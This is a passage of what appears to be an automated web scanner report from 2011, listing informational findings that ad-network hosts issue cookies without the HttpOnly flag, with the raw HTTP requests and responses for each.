GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=88105499721132220&clkurl=http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAfxzeJwAAAAA./cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUaGIdSlqXB8gTNDuT_OL7eWkwL7QDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7nWCoCsZmAAAFGskws-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUVGIL2vn32CiWPiwQj5OTzmIjggADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqR9VoXJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJBgYmDqXAP3QDDTzF9BMd5iZk_Qj_KFyGP7r5djmDZXDcEsvh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqBxGPHRIuN_GqU_CThuXvvaTOzfh0td.ckYtTrkTwouBYcuIU76yWwgoz.B7XK8BlIoCbzEKMgLT005GfiDFYMDHwMjMyMLEys_GyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XNyoRd42J3RqCjYIkW5AIGAPYfk5A-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:18 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3928
Date: Mon, 09 May 2011 15:35:17 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...

11.15. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;231082307;55315497;e?http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1
Set-Cookie: id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 15:35:33 GMT
Server: GFE/2.0
Content-Type: text/html


11.16. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1114604&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~"; bh="b!!!%.!!!?H!!!!%<wR0_!!*oY!!!!*<yqWL!!-?2!!!!0<yqWL!!-G2!!!!$<w[UB!!-O3!!!!$<yqWL!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!+<yqWL!!0O4!!!!*<ypn@!!0O<!!!!1<ypn@!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!0<ypn@!!J<E!!!!0<ypn@!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!+<yqWL!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!)<yqWL!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!1<ypn@!!q:E!!!!.<ypn@!!q<+!!!!/<ypn@!!q</!!!!/<ypn@!!q<3!!!!/<ypn@!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#<ypn@!!tjQ!!!!+<yqWL!!ucq!!!!1<ypn@!!vRm!!!!*<ypn@!!vRq!!!!*<ypn@!!vRr!!!!*<ypn@!!vRw!!!!1<ypn@!!vRx!!!!*<ypn@!!vRy!!!!*<ypn@!!w3l!!!!+<yqWL!!wQ3!!!!+<yqWL!!wQ5!!!!+<yqWL!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!*<ypn@!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!)<yqWL!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!*<ypnB!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!*<ypn@!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!*<ypn@!#7.'!!!!*<ypn@!#7.:!!!!*<ypn@!#7.O!!!!*<ypn@!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!*<ypn@!#MTF!!!!*<ypn@!#MTH!!!!*<ypn@!#MTI!!!!*<ypn@!#MTJ!!!!*<ypn@!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N45!!!!#<xr]M!#O29!!!!)<yqWL!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!0<ypn@!#SF3!!!!0<ypn@!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!*<ypn@!#UDP!!!!0<ypn@!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!)<yqWL!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!)<yqWL!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!)<yqWL!#`S2!!!!+<yqWL!#`U0!!!!*<yqWL!#`U9!!!!)<yqWL!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!*<yqWL!#a=7!!!!*<yqWL!#a=9!!!!*<yqWL!#a=P!!!!*<yqWL!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!*<ypn@!#ai7!!!!*<ypn@!#ai?!!!!*<ypn@!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!)<yqWL!#c8W!!!!)<yqWL!#c8X!!!!)<yqWL!#c8]!!!!)<yqWL!#c?c!!!!*<ypn@!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!#<yqWL!#e9?!!!!#<y,`,!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!)<yqWL!#fG+!!!!*<yqWL!#g=!!!!!)<yqWL!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!)<yqWL!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!*<ypn@!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!*<ypn@!#tM)!!!!*<ypn@!#tn2!!!!*<ypn@!#uE=!!!!#<x9#K!#uJY!!!!0<ypn@!#uR3!!!!)<yqWL!#ujQ!!!!)<yqWL!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!*<ypn@!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!#<yq29!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!-<ypn@!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!(<yqWL!$#R7!!!!*<ypn@!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!*<ypn@!$(!P!!!!+<yqWL!$(+N!!!!#<wGkB!$(Gt!!!!-<ypn@!$(S9!!!!)<yqWL!$(Tb!!!!#<yQLc!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!+<yqWL!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!)<yqWL"; ih="b!!!!A!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypn>!0242!!!!#<ypnV!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; vuday1=%)0sH[[@+$qtDL:!1e0gra^fk; BX=8khj7j56qmjsh&b=4&s=dk&t=106; lifb=C7NV=W,ZP69,/lZve[$G>MqpcO*GC#5JO?Y

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:35:41 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!*<yqWL!!-?2!!!!0<yqWL!!-G2!!!!$<w[UB!!-O3!!!!$<yqWL!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!+<yqWL!!0O4!!!!*<ypn@!!0O<!!!!1<ypn@!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!0<ypn@!!J<E!!!!0<ypn@!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!+<yqWL!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!)<yqWL!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!1<ypn@!!q:E!!!!.<ypn@!!q<+!!!!/<ypn@!!q</!!!!/<ypn@!!q<3!!!!/<ypn@!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#<ypn@!!tjQ!!!!+<yqWL!!ucq!!!!1<ypn@!!vRm!!!!*<ypn@!!vRq!!!!*<ypn@!!vRr!!!!*<ypn@!!vRw!!!!1<ypn@!!vRx!!!!*<ypn@!!vRy!!!!*<ypn@!!w3l!!!!+<yqWL!!wQ3!!!!+<yqWL!!wQ5!!!!+<yqWL!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!*<ypn@!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!)<yqWL!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!*<ypnB!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!*<ypn@!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!*<ypn@!#7.'!!!!*<ypn@!#7.:!!!!*<ypn@!#7.O!!!!*<ypn@!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!*<ypn@!#MTF!!!!*<ypn@!#MTH!!!!*<ypn@!#MTI!!!!*<ypn@!#MTJ!!!!*<ypn@!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N45!!!!#<xr]M!#O29!!!!)<yqWL!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!0<ypn@!#SF3!!!!0<ypn@!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!*<ypn@!#UDP!!!!0<ypn@!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!)<yqWL!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!)<yqWL!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!)<yqWL!#`S2!!!!+<yqWL!#`U0!!!!*<yqWL!#`U9!!!!)<yqWL!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!*<yqWL!#a=7!!!!*<yqWL!#a=9!!!!*<yqWL!#a=P!!!!*<yqWL!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!*<ypn@!#ai7!!!!*<ypn@!#ai?!!!!*<ypn@!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!)<yqWL!#c8W!!!!)<yqWL!#c8X!!!!)<yqWL!#c8]!!!!)<yqWL!#c?c!!!!*<ypn@!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!#<yqWL!#e9?!!!!#<y,`,!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!)<yqWL!#fG+!!!!*<yqWL!#g=!!!!!)<yqWL!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq[g!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!)<yqWL!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!*<ypn@!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!*<ypn@!#tM)!!!!*<ypn@!#tn2!!!!*<ypn@!#uE=!!!!#<x9#K!#uJY!!!!0<ypn@!#uR3!!!!)<yqWL!#ujQ!!!!)<yqWL!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!*<ypn@!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!#<yq29!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!-<ypn@!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!(<yqWL!$#R7!!!!*<ypn@!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!*<ypn@!$(!P!!!!+<yqWL!$(+N!!!!#<wGkB!$(Gt!!!!-<ypn@!$(S9!!!!)<yqWL!$(Tb!!!!#<yQLc!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!+<yqWL!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!)<yqWL"; path=/; expires=Wed, 08-May-2013 15:35:41 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=9,/lZve[$G>MqpcO*GC#CYO/u; path=/; expires=Mon, 09-May-2011 22:00:30 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=8_QLCI2F-gIQq5e67QM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 15:35:41 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


11.17. http://ads.bridgetrack.com/a/f/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:41 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=9996D17BE9434FAF86AAA6900B6D6F82&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=588064&Cr=71712&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=15920d163AJLc68c268c1FJ7Nc38c1CFc2610cHU90cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=89BD0AAD619444D2AFEC01012356111B; path=/
